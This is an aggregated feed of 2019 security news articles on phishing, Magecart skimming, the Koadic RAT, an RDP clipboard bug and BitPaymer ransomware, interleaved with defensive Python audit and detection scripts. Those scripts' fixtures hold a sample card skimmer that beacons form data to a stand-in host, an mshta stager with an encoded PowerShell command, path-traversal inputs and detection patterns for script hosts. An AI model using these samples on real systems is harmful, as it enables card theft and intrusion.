STE WILLIAMS

Your biz won’t be hacked by a super-leet exploit. It’ll be Bob in sales opening a dodgy email

Backgrounder The good news for enterprise security is that the number of reported cyberattacks is going down, in the UK at least.

The cloud behind that silver lining? According to the British government, 61 per cent of large businesses experienced some sort of breach last year and, more worryingly, 20 per cent of large firms were hit on a weekly basis.

Trying to keep one step ahead of the bad guys has proved tricky, and enterprise security professionals who have moved to protect themselves in one area will invariably find cyber-criminals probing a new spot. According to Peter Firstbrook, research director at Gartner, “Whenever they do a new method of attack, then it’s going to work because we haven’t worked out how to build a defense for the countermeasure.”

In other words, there’s always going to be a way in to the enterprise – even the best protected ones. So what are the attack vectors, and how can you protect yourself?

One of the most common methods used to introduce malware remains the faithful email attachment. According to a 2018 survey from Verizon, email was the delivery method in 94 per cent of cases, with Office and PDF documents the favorite vehicles.

One of the newer techniques deployed by cyber criminals is to use non-standard server ports as the way into corporate systems.

‘Cost reasons’

Paul Kenealy, head of incident response at PA Consulting, said it’s a method that’s been made possible because sysadmins put development servers on non-standard ports, or because of the proliferation of IoT devices that listen on non-standard ports by default. Going through such ports gives attackers a vital means of establishing a beachhead: the servers behind them sit on the corporate network, so once in, the malware can spread. “Ideally the entire infrastructure should be separated – development, pre-development, production environment – but we know they’re not, generally for cost reasons,” Kenealy adds.

One route that’s proving a particular favorite in this field is port 8080 or similar, which can be a shortcut for attackers. “It’s more usually used for a web proxy, but a sysadmin could put a development server there,” Kenealy explains. The reason these ports are left hanging is a consequence of the fast pace of corporate IT. Somebody invariably wants to provision development servers quickly to work on a new project or product, but the sysadmins then move on and forget about these unsecured services.
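An added example of the check a practitioner would run here (not code from the article or from PA Consulting): it parses the listening-socket output of `ss -tlnp` and reports every externally reachable listener whose port is not on an approved baseline, which is how a forgotten development server on 8080 surfaces in an audit. The sample output, the approved port set and the host are constructed for the illustration.

```python
"""Flag TCP listeners outside an approved service baseline (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumed baseline for a hypothetical host: the only ports it should expose.
APPROVED_PORTS = {22, 443}

# Constructed `ss -tlnp` output standing in for a real capture.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:443          0.0.0.0:*          users:(("nginx",pid=1203,fd=6))
LISTEN  0       128     127.0.0.1:5432       0.0.0.0:*          users:(("postgres",pid=990,fd=5))
LISTEN  0       50      *:8080               *:*                users:(("java",pid=2210,fd=12))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""

# One LISTEN row: state, queues, local addr:port, peer, optional process blob.
_ROW = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+"
    r'(?:\s+users:\(\("(?P<proc>[^"]+)")?'
)

LOOPBACK = {"127.0.0.1", "[::1]"}


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    process: str
    exposed: bool  # bound to something other than loopback


def parse_ss(output: str) -> list[Listener]:
    """Turn `ss -tlnp` text into Listener records; non-matching lines are skipped."""
    listeners = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        addr = m.group("addr")
        listeners.append(
            Listener(addr, int(m.group("port")), m.group("proc") or "?", addr not in LOOPBACK)
        )
    return listeners


def unexpected_listeners(output: str, approved=APPROVED_PORTS) -> list[Listener]:
    """Listeners reachable off-host whose port is not in the baseline."""
    return [l for l in parse_ss(output) if l.exposed and l.port not in approved]


if __name__ == "__main__":
    for l in unexpected_listeners(SAMPLE_SS_OUTPUT):
        print(f"UNEXPECTED {l.addr}:{l.port} ({l.process})")
```

Against a live host, feed the real `ss -tlnp` output to `unexpected_listeners` in place of the sample. The loopback-only database listener is deliberately not reported: the question being asked is what the network can reach, and a dev server bound to all interfaces on 8080 is exactly what Kenealy describes.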

Another growing threat to the enterprise is fileless malware. A Ponemon Institute survey [PDF] found that 77 per cent of successful compromises involved fileless techniques, and the report suggests these attacks are more likely to succeed than file-based ones. Fileless malware doesn’t need to drop an executable on disk to gain a foothold; it runs from memory or through built-in scripting and administration tools, which makes it hard for conventional, file-scanning anti-virus software to pick up. It is also versatile: the initial access can come through one of those non-standard ports or an attached document.

There are, of course, other methods being employed in attacks that are proving fruitful, not least the growing use of encryption. A few years back, Gartner Research highlighted how encrypted and encapsulated traffic “weakens defense-in-depth efficiency, exposing endpoints and DMZ servers to threats from outbound and inbound traffic.”

Encryption can be a force for good in the enterprise, but Kenealy warns organisations now need to be wary of its use against them. “Encryption, like many things, is a double-edged sword,” he says. “It means that attacks can’t be unpicked so easily. And as more attacks get encrypted, it’s easier for malware to hide.”

So, how does the enterprise defend itself against attacks, new and old?

Bill Mew, managing director of The Crisis Team, says people are increasingly interested in measuring the strength of their protection using the services of cyber risk agencies who claim they can give your organisation a risk rating.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/new_enterprise_threats/

Crack the Defenses of iOS and other Platforms at Black Hat USA

Get the latest insights into how to attack and defend platforms like iOS, MacOS, and Windows 10 at this upcoming August security conference.

Cybersecurity professionals, take note: there’s an entire track of Platform Security Briefings lined up for Black Hat USA this August that will equip you with the latest knowledge, tools, and tricks to improve or compromise the security of iOS and Windows hardware and software.

Apple security professionals will be presenting Behind the scenes of iOS and Mac Security, an in-depth 50-minute Briefing that will demo everything from code integrity enforcement on Apple chips (including the A12 Bionic and S4) to the T2 security chip. You’ll get a guided walkthrough of processes like the T2 secure boot, with stops along the way to examine common attacks and defenses at each stage. Most importantly, you’ll be introduced to two publicly undisclosed firmware security measures.

For outside perspective on the same tech check out Inside The Apple T2, in which Duo Labs researchers will give you an assessment of the T2 chip’s security posture and the strengths and weaknesses of its communication with MacOS. They’ll also demonstrate the ability to interface directly with the T2 chip from unprivileged user space code by writing their own client application, and present methods and tooling to query the T2’s exposed services as well as decode and encode valid messages.

For some insight into the security of Microsoft’s Windows platform, make time to attend Battle of Windows Service: A Silver Bullet to Discover File Privilege Escalation Bugs Automatically. In this 25-minute Briefing you’ll see how one researcher created a “silver bullet” to discover Windows 10 file privilege escalation bugs, then used it to find at least four new vulnerabilities. You’ll also see how the technique makes use of the Advanced Local Procedure Call (ALPC) mechanism, how it opened up new attack surfaces, and how the researcher built a system to discover file privilege escalation bugs automatically. Plus, you’ll learn how to exploit those vulnerabilities, bypass the security check, and play with impersonation. Don’t miss it!

Black Hat USA returns to the Mandalay Bay in Las Vegas August 3-8, 2019. For more information on what’s happening at the event and how to register, check out the Black Hat website.

Article source: https://www.darkreading.com/black-hat/crack-the-defenses-of-ios-and-other-platforms-at-black-hat-usa/d/d-id/1335293?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

2015 database hack is the terrible gift that keeps giving for Slack: Tens of thousands of passwords now reset

Slack says a 2015 database theft is to blame for a large-scale reset of stolen passwords.

The Discord-for-Suits developer said on Thursday that it was resetting the passwords for roughly 1 per cent of its 10 million or so accounts after an investigation revealed that stolen credentials were being sold online. These included customer profiles, hashed passwords and also some passwords in clear text that were harvested on the fly.

The stolen credentials came to Slack’s attention as a tip through its bug bounty program and were originally thought to be the result of isolated malware infections or phishing operations. After investigating further, Slack found the usernames and passwords had been lifted in a network intrusion that occurred more than four years ago.

“We immediately confirmed that a portion of the email addresses and password combinations were valid, reset those passwords, and explained our actions to the affected users,” Slack said in a post explaining the move.

“However, as more information became available and our investigation continued, we determined that the majority of compromised credentials were from accounts that logged in to Slack during the 2015 security incident.”

The incident came to light in March 2015, when Slack found that during the previous month someone had gained access to an internal database containing customer profile information. While the passwords in that database were hashed, the attackers also managed to insert code that harvested account credentials as they were entered on the Slack website, resulting in the theft of some accounts.


Jump back to 2019, when Slack received reports of the credentials being sold. It turns out that someone had dug up the details lifted during the earlier intrusion, found credentials that still worked, and then flogged those on a crimeware market.

Fortunately, Slack says, the overwhelming majority of users did not need to have their accounts reset. The only users at risk are people who began using Slack before February of 2015, have not reset their passwords since the break-in took place, and have not enabled two-factor authentication on their accounts.

In short, only those old-timers with poor security practices are at risk, and they are now going to have to get a new, secure password, whether they like it or not.

This all comes as the chat app maker struggles to push its stock price up in the wake of a June IPO that fell flat. At the time of writing, Slack shares had closed at $32, down 4.36 per cent on the day. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/2015_database_hack_slack/

It’s never good when ‘Magecart’ and ‘bulletproof’ appear in the same sentence, but here we are

A growing crop of so-called bulletproof hosting companies are using the ongoing civil war in Ukraine to host Magecart malware without fear of the police coming knocking.

Researchers with security shop Malwarebytes say that the data-exfiltration and hosting servers used by Magecart operations to collect harvested card details have been traced to the Ukrainian city of Luhansk, located in an area contested by pro-European and pro-Russian forces.

Here’s how it works: Magecart’s operators hack websites to inject malicious script into the payment pages of reputable sites. After netizens type their bank card details into those infected payment pages, the Magecart code uploads the victims’ sensitive personal information to command-and-control servers physically housed in Luhansk, Ukraine, where hosting companies know that the ongoing conflict means there is little chance of a raid from police officers or g-men. Basically, there’s no functioning government available to investigate the server hosts.
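The following is an added example, not code from the article or from Malwarebytes, of the audit a site owner can run on a payment page: it lists every host the page loads script from, posts forms to, or references from inline script, and flags those not on an allowlist. A skimmer needs both a place to run and a place to send the card data, so an unexpected host in either role is the signal. The HTML, the allowlist and the host names are constructed.

```python
"""Audit a payment page for script sources and data sinks off the allowlist (added example)."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist for a hypothetical shop: first party plus its payment provider.
ALLOWED_HOSTS = {"shop.example", "js.payments.example"}

# Constructed checkout page: one legitimate script tag, one injected skimmer
# that loads from a look-alike CDN and beacons the form contents out via an image URL.
SAMPLE_PAGE = """
<html><body>
<form action="/checkout/submit" method="post"> ... </form>
<script src="https://js.payments.example/v2/card.js"></script>
<script src="//cdn-stats-collect.example/jquery.min.js"></script>
<script>
  document.querySelector('form').addEventListener('submit', function () {
    var img = new Image();
    img.src = 'https://cdn-stats-collect.example/g?d=' + btoa(document.forms[0].innerHTML);
  });
</script>
</body></html>
"""

_URL = re.compile(r"""https?://[^\s'"<>]+""")


class _Collector(HTMLParser):
    """Collects script src values, form actions and inline script bodies."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.form_actions: list[str] = []
        self.inline: list[str] = []
        self._buf: list[str] | None = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._buf = []
            if a.get("src"):
                self.external.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None


def _host(url: str, page_host: str) -> str:
    # Protocol-relative URLs ("//host/x") and relative paths resolve against the page itself.
    if url.startswith("//"):
        url = "https:" + url
    return urlparse(url).hostname or page_host


def audit_page(html: str, page_host: str, allowed=ALLOWED_HOSTS) -> dict:
    """Map every host the page runs code from or sends data to -> the roles it plays."""
    c = _Collector()
    c.feed(html)
    c.close()
    hosts: dict[str, set[str]] = {}
    for src in c.external:
        hosts.setdefault(_host(src, page_host), set()).add("script-src")
    for action in c.form_actions:
        hosts.setdefault(_host(action, page_host), set()).add("form-action")
    for body in c.inline:
        for url in _URL.findall(body):
            hosts.setdefault(_host(url, page_host), set()).add("inline-script-url")
    return {
        "hosts": hosts,
        "unexpected": sorted(h for h in hosts if h not in allowed),
        "inline_script_count": len(c.inline),
    }


if __name__ == "__main__":
    report = audit_page(SAMPLE_PAGE, "shop.example")
    for host in report["unexpected"]:
        print(f"UNEXPECTED {host}: {sorted(report['hosts'][host])}")
```

A Content-Security-Policy with tight `script-src`, `connect-src`, `form-action` and `img-src` directives turns the same allowlist into a control the browser enforces; the audit is still worth running, because a skimmer spliced into an already-allowed first-party script passes `script-src` and only betrays itself through the host it exfiltrates to.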

These data centers, pitched as ‘bulletproof,’ naturally appeal to groups running less-than-reputable operations that would be subject to raids or takedown requests if hosted in other locations.

“Due to the very nature of such hosts, takedown operations are difficult,” Malwarebytes explained. “It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.”

The use of bulletproof hosting is particularly bad in the case of Magecart, as it eliminates one of the more effective means of stopping the infection – disabling command and control servers.


Because Magecart operates by injecting a small chunk of code into individual payment pages (as opposed to installing an entire malware payload, for example) it can be difficult to find and scrub from the compromised sites themselves.

On the other hand, the exfiltration servers where the harvested card data was sent and the command servers where the malware was controlled are weak spots that, if disabled, would effectively shut down the card-harvesting operation.

Now, with the C2 and exfiltration servers stashed behind bulletproof hosts, Malwarebytes says it is having to block all domains and IP addresses associated with the skimmers.

This as Magecart is also expanding its operation into the fertile ground of unprotected S3 buckets.

Last week researchers reported that more than 17,000 sites had been seeded with Magecart code after the storage buckets hosting their pages were left publicly writable on the internet. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/18/magecart_ukraine_hosting/

8 Legit Tools and Utilities That Cybercriminals Commonly Misuse

Threat actors are increasingly ‘living off the land,’ using publicly available management and administration tools to conceal malicious activity.



Cybercriminals have long used legitimate management and administration tools to break into enterprise networks, move laterally within them, and maintain persistence.

Lately, though, use of these so-called living-off-the-land tactics has increased substantially.

Positive Technologies recently analyzed the tools that 29 advanced persistent threat groups are currently using in their campaigns worldwide. Its study shows that more than half of them leverage legitimate, publicly available penetration testing and systems administration tools to develop their attacks after gaining an initial foothold on a network.

The reason? Such tools allow attackers to hide their activities in a sea of legitimate traffic. “Threat actors increasingly leverage dual-use tools or tools that are already preinstalled on targeted systems to carry out cyberattacks,” said Fortinet in a recent report.

This makes it harder for defenders to spot malicious activity and makes attack attribution much more difficult. “Unfortunately, adversaries can use a wide range of legitimate tools to accomplish their goals and hide in plain sight,” Fortinet said.

Here, according to security experts, are eight of the most commonly abused legitimate utilities and tools.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/8-legit-tools-and-utilities-that-cybercriminals-commonly-misuse/d/d-id/1335254?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Open Source Hacking Tool Grows Up

Koadic toolkit gets upgrades – and a little love from nation-state hackers.

An open source white-hat hacking tool that nation-state hacking teams out of China, Iran, and Russia have at times employed to avoid detection has been updated with new features that allow attacks to persist and spread more efficiently.

Sean Dillon, creator of the so-called Koadic tool that works like a remote access Trojan (RAT), says the software he first released two years ago at DEF CON can now extract information and intelligence about a targeted Windows environment, more efficiently scrape user credentials, and more easily spread around a network. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” says Dillon, who plans to show off Koadic’s new features next month at the Black Hat USA Arsenal in Las Vegas.

Koadic is basically a RAT based on VBScript and JScript that uses built-in Windows executables such as PowerShell rather than a custom malware binary, so it mirrors a growing trend of sophisticated attackers employing legitimate tools instead of writing or burning their own exploits. The trend, known as “living off the land,” also allows attackers to remain under the radar as they run internal Windows tools like PowerShell to hack their way through networks.

Koadic uses built-in Windows executables and most recently added Windows Management Instrumentation (WMI) and SysAdmin to its quiver. “These are binaries that are shipped by default with all versions of Windows,” Dillon notes, and they are signed by Microsoft so they can slip past most application-whitelisting products. The original version of Koadic targeted a single machine and had little ability to move laterally to other machines.

“We now have several different ways to poke into the system, and when a computer is back up from a restart” the attack will continue, he notes.

Among some of the newer features: UAC (user account control) bypasses, automated file-discovery, and credential storage that converts Mimikatz outputs into a searchable form.

Nation-state groups, such as China’s Stone Panda, Iran’s MuddyWater, and Russia’s Fancy Bear, all have been spotted using Koadic in their hacking campaigns. “In the past year or two, APT groups have been using open source tools in order to hide out,” Dillon says. “If they write custom malware, the attack could be attributed to them. … If they use something open source, it’s hard to see who is attacking an organization.”

But Dillon’s intent for the tool is to help professional penetration testers find holes before the bad guys do. Still, Koadic today continues to easily bypass most endpoint security tools: “Every time [the vendors] come up with a detection for it, we come up with another evasion,” he says. Sometimes it’s only a matter of changing a comma or a word in the string, and it breaks the anti-malware vendor’s detection signature, he notes.

That underscores the need for better behavioral detection methods for defenses, he adds.
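To make Dillon’s point concrete, here is an added example (not code from the article or from the Koadic project) that runs a string signature and a behavioral rule set over constructed process-creation events of the kind Sysmon or EDR agents record: parent image, image and command line. The signature keys on one exact command line and is defeated by an extra space and a stray comma; the behavioral rules key on which Microsoft-signed binaries are chained together (an Office process spawning a script host, a script host spawning PowerShell, a proxy-execution binary fetching from a URL) and on an encoded PowerShell command, so the edit does not help. The binaries, the IP address and the event lines are assumptions for the illustration.

```python
"""Signature vs behavioral detection over constructed process-creation events (added example)."""
from __future__ import annotations

import re

# Constructed events in the shape Sysmon/EDR agents record: ts|parent|image|cmdline.
# 10:00:09 and 10:00:11 are the same stager launch; the second has an extra space
# and a trailing comma, the kind of edit Dillon describes breaking a signature.
SAMPLE_EVENTS = """\
10:00:01|explorer.exe|WINWORD.EXE|"C:\\Program Files\\Office\\WINWORD.EXE" invoice.docx
10:00:09|WINWORD.EXE|mshta.exe|mshta.exe http://198.51.100.7/stage
10:00:10|mshta.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
10:00:11|WINWORD.EXE|mshta.exe|mshta.exe  http://198.51.100.7/stage ,
10:05:00|services.exe|svchost.exe|svchost.exe -k netsvcs
10:06:00|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1
"""

# Assumed role sets (not from the article): Office apps that should never spawn a
# script host, and Microsoft-signed binaries that run script or fetch remote content.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "regsvr32.exe", "rundll32.exe"}
REMOTE_FETCHERS = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common ones.
_ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b")

# A classic string signature: one exact command line.
SIGNATURE = "mshta.exe http://198.51.100.7/stage"


def parse_events(text: str) -> list[dict]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append({"ts": ts, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline})
    return events


def signature_hits(events: list[dict]) -> list[str]:
    """Timestamps whose command line equals the signature string exactly."""
    return [e["ts"] for e in events if e["cmdline"] == SIGNATURE]


def behavioral_rules(e: dict) -> list[str]:
    """Rules keyed on process lineage and intent rather than on exact strings."""
    hits = []
    if e["parent"] in OFFICE and e["image"] in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")
    if e["parent"] in SCRIPT_HOSTS and e["image"] in SCRIPT_HOSTS:
        hits.append("script-host-chain")
    if e["image"] == "powershell.exe" and _ENCODED.search(e["cmdline"]):
        hits.append("encoded-powershell")
    if e["image"] in REMOTE_FETCHERS and "http" in e["cmdline"].lower():
        hits.append("remote-payload-fetch")
    return sorted(hits)


def behavioral_hits(events: list[dict]) -> dict[str, list[str]]:
    """ts -> rules fired, for every event that fired at least one rule."""
    return {e["ts"]: r for e in events if (r := behavioral_rules(e))}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("signature :", signature_hits(evs))
    print("behavioral:", behavioral_hits(evs))
```

The rules still need tuning per estate (an administrator’s legitimate `-EncodedCommand` use fires the PowerShell rule, and the scheduled backup script above is left alone only because its parent and arguments look normal), but that tuning happens on behaviour the attacker has to exhibit, not on bytes they can reorder.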

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/open-source-hacking-tool-grows-up/d/d-id/1335296?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

RDP Bug Takes New Approach to Host Compromise

Researchers show how simply connecting to a rogue machine can silently compromise the host.

Most security professionals know they can use Microsoft’s Remote Desktop Protocol (RDP) to connect to other machines but may not consider how merely using RDP could compromise one.

A recently discovered RDP vulnerability could silently compromise a host when it connects to a rogue machine, researchers report. CVE-2019-0887, discovered by Eyal Itkin, a vulnerability researcher with Check Point Software Technologies, was classified as Important and patched this month. Microsoft has not yet seen any evidence this flaw has been exploited in the wild.

The remote code execution bug is in Remote Desktop Services, formerly known as Terminal Services, when an authenticated attacker abuses clipboard redirection. A successful attacker could execute malicious code on a target system; install programs; view, change, or delete data; or create new accounts with full user rights. To exploit the vulnerability, however, an attacker must first compromise Remote Desktop Services and wait for a victim system to connect.

Most RDP vulnerabilities allow an attacker to compromise the server, then approach new victim machines using RDP, says Dana Baril, security software engineer at Microsoft. An example is BlueKeep, the critical remote code execution vulnerability that prompted Microsoft to issue patches for out-of-support Windows systems when it fixed the bug in May. BlueKeep could let unauthenticated attackers break into a server by abusing a bug in the server itself.

“Most of the time people look for vulnerabilities in the server and try to expand from their computer to a new one on the network,” Itkin explains. This flaw is different.

“In this case, the victim machine is the one that initiated the connection,” Baril continues. “We have one compromised machine using lateral movement technique; this gets connections from victim machines and spreads the exploit.”

Itkin was researching lateral movement attack vectors when he discovered the vulnerability. “If we take over a single machine and ambush a single user or IT admin, we directly get privilege without moving around a network too much,” he explains. This specific bug exists in the clipboard, particularly in the way it synchronizes communication between the client and server.

By default, RDP clipboard redirection is enabled, so the client and the server share a clipboard for the duration of the session. When a client pastes a file copied from the server, the server tells the client where to store it. If attackers control a single device, they can slow it down, post pop-up messages, or cause other distractions so the corporate user opens a ticket and says the machine isn’t working.

“Usually when you take over a machine you try to be stealthy,” says Itkin. But because an attacker wants the IT manager to remotely connect to their target using RDP, “we make a lot of noise, and we make IT users connect to a machine and check it out.” When the client connects, the attacker could use the clipboard function to download and store malicious files.

Clipboards were designed to be used locally and therefore trusted, Baril adds. This vulnerability exposes machines to a clipboard they can no longer trust. Baril and Itkin will discuss the details of the vulnerability, and approach the attack from both offensive and defensive perspectives, in their upcoming Black Hat USA briefing, “He Said, She Said — Poisoned RDP Offense and Defense.”
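The article doesn’t spell out the mechanics of CVE-2019-0887, so the following is an added illustration of the client-side principle rather than Microsoft’s or Check Point’s code: when the remote end of a shared clipboard tells the client where a pasted file should land, that path is untrusted input and has to be confined to the directory the local user actually chose. The paste directory and the peer-supplied file list are constructed; the check uses POSIX path rules so it runs anywhere, while still rejecting Windows drive letters and backslash separators the way a cross-platform client would have to.

```python
"""Confine a peer-supplied paste destination to the local paste directory (added example)."""
from __future__ import annotations

import ntpath
import posixpath


class UnsafeDestination(ValueError):
    """The remote side asked for a location outside the paste directory."""


def confine_destination(base_dir: str, supplied: str) -> str:
    """Resolve `supplied` (a path the remote side chose) inside `base_dir`, or refuse.

    Uses POSIX rules so the check behaves the same on any host, but also
    rejects Windows drive letters and normalises backslashes, because the
    peer on an RDP session is a Windows machine.
    """
    if not base_dir.startswith("/"):
        raise ValueError("base_dir must be an absolute POSIX path")
    if not supplied or "\x00" in supplied:
        raise UnsafeDestination(f"empty or NUL-containing path: {supplied!r}")
    if ntpath.splitdrive(supplied)[0]:
        raise UnsafeDestination(f"drive-qualified or UNC path refused: {supplied!r}")
    rel = supplied.replace("\\", "/")
    if rel.startswith("/"):
        raise UnsafeDestination(f"absolute path refused: {supplied!r}")
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, rel))
    # commonpath, not startswith: "/paste" must not accept "/paste-evil/x".
    if posixpath.commonpath([base, target]) != base:
        raise UnsafeDestination(f"path escapes paste directory: {supplied!r}")
    return target


def is_refused(base_dir: str, supplied: str) -> bool:
    try:
        confine_destination(base_dir, supplied)
    except UnsafeDestination:
        return True
    return False


# Constructed file list as a malicious peer might present it on paste.
PEER_FILE_LIST = [
    "report.pdf",
    "..\\..\\.ssh\\authorized_keys",
    "C:\\Users\\Public\\run.exe",
    "sub/./ok.txt",
    "sub/../../startup/evil.lnk",
]


def accept_paste(base_dir: str, entries: list[str]) -> tuple[list[str], list[tuple[str, str]]]:
    """Split a peer's file list into resolved safe targets and refused entries."""
    accepted, refused = [], []
    for entry in entries:
        try:
            accepted.append(confine_destination(base_dir, entry))
        except UnsafeDestination as exc:
            refused.append((entry, str(exc)))
    return accepted, refused


if __name__ == "__main__":
    ok, bad = accept_paste("/home/alice/rdp-paste", PEER_FILE_LIST)
    print("accepted:", ok)
    print("refused :", [name for name, _ in bad])
```

On the client side the channel can also simply be turned off for sessions to machines you don’t fully trust: clear the Clipboard option under Local Resources in mstsc, or set `redirectclipboard:i:0` in a saved .rdp file.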

Following his discovery, Itkin informed Microsoft and went through the coordinated vulnerability disclosure process. After Microsoft issued a patch, he continued to collaborate with the research team and later found the same bug had been inherited by Hyper-V: the Hyper-V Manager uses RDP under the hood to manage virtual machines. Both issues are now fixed.

While companies should install the patch to fully protect themselves, Baril notes the technique can also be picked up from Windows telemetry, though not with the usual approaches. “This attack technique was very hard to detect using existing telemetry,” she says, adding that normal detection wouldn’t work because the behavior doesn’t look unusual on its own. To help users before they install the patch, Microsoft created a behavioral detection using the Windows Event Log. The researchers correlated clipboard and RDP events to generate detection logic that spots the tactic in action, so businesses will know if they’re targeted even if they haven’t yet applied the update.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/risk/rdp-bug-takes-new-approach-to-host-compromise/d/d-id/1335297?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

BitPaymer Ransomware Operators Wage Custom, Targeted Attacks

A new framework is allowing the threat group to compile variants of the malware for each victim, Morphisec says.

The BitPaymer ransomware operators now are creating new variants of the malware hours before deploying it on a target network – making detection much more difficult.

Researchers from Morphisec say they have observed the tactic being used against numerous public and private sector organizations across the US over the last three months.

In a report Thursday, the security vendor said it is aware of at least 15 organizations including those in the finance, agriculture, and technology sectors that have been targeted in this way. Most had between 200 and 1,000 employees, while two of the victims employed more than 2,000 people. Numerous servers belonging to at least two of the targeted organizations were infected.

In each of the attacks, the threat group gained initial access to the target network via phishing emails that distributed Dridex, a well-known data and credential-stealing malware. Once on the network, the attacker stole Active Directory credentials and conducted reconnaissance for sensitive servers and systems to infect. They then waited for the weekend to actually deploy the ransomware.  

“This carefully planned timing allows them to propagate the ransomware to 24/7 running servers and then spread as the first employees returning to work from the weekend log in to the compromised network,” Morphisec said.

Michael Gorelik, CTO at Morphisec, says what makes the latest BitPaymer campaign interesting is a new attack framework that enables the threat group to obfuscate and compile a custom loader for the malware literally hours before it is deployed.

The ransomware payload itself that is being used in the attacks was compiled about four months ago, and has been used in previous campaigns including one that disrupted operations in a major way at Arizona Beverages last May. But by wrapping the payload in new loaders for each target just hours before attacking them, the BitPaymer attackers are making it much harder for signature-based detection tools to spot the malware, Gorelik says.

Also complicating matters for targeted organizations are the sophisticated tactics the threat group has begun using to evade static and behavior-based detection tools. Upon loading, BitPaymer, like many other malware tools, looks for certain clues about where it is running and terminates automatically under certain conditions.

But one new tactic the malware uses—first described by a security researcher at Black Hat 2018—is to look for a specific dummy file (“C:\aaa_TouchMeNot.txt”) that is found only in a Windows Defender AV Emulator environment and to terminate execution if it spots the file. “If the malware sees the file it stops working, so the emulator thinks it’s harmless,” Gorelik says. “But when the malware runs in the real environment it suddenly starts working.”

There are multiple other features in the malware that make it dangerous as well, he says. One is a function that allows the malware to bypass User Account Control (UAC) to elevate its privileges on an infected system. When running with elevated privileges, the malware deletes the volume shadow copies on the infected host, removing a common recovery path. BitPaymer also includes several obfuscation capabilities, including the use of a lot of junk code, to make it tough to spot.

Growing Targeted Threat

For organizations, ransomware like BitPaymer once again highlights the importance of preventive controls, Gorelik says. None of the sophisticated features the malware incorporates would matter if enterprises could prevent it from getting an initial foothold in the first place, he says.

This latest BitPaymer campaign is consistent with other reports about a sharp spike in targeted ransomware attacks over the past year. Increasingly, attackers have begun eschewing mass, low-payoff attacks for highly targeted ones against medium and large companies, where the potential returns are orders of magnitude higher.

Hackers hit the city of Riviera Beach, Florida, this June, for example, and collected $600,000 after officials there decided to pay the demanded ransom rather than risk lengthy downtime in recovering encrypted systems. Lake City, in Florida paid $460,000 a few weeks later for the same reason.

A new report from Coveware shows that average ransom payments increased 184% between the first and second quarter this year – from $12,762 to $36,295. Much of the increase stemmed from the growing prevalence of Ryuk and Sodinokibi, two ransomware variants associated with high ransom demands.

Significantly, the average downtime following a ransomware attack also jumped substantially from 7.3 days in Q1 to 9.6 days in the second quarter. The Coveware study found that organizations that paid off their attackers received a decryption key 96% of the time and were able on average to recover about 92% of their encrypted data.


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/bitpaymer-ransomware-operators-wage-custom-targeted-attacks/d/d-id/1335298?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Security Lessons From a New Programming Language

A security professional needed a secure language for IoT development. So he wrote his own, applying learned lessons about memory and resources in the process.

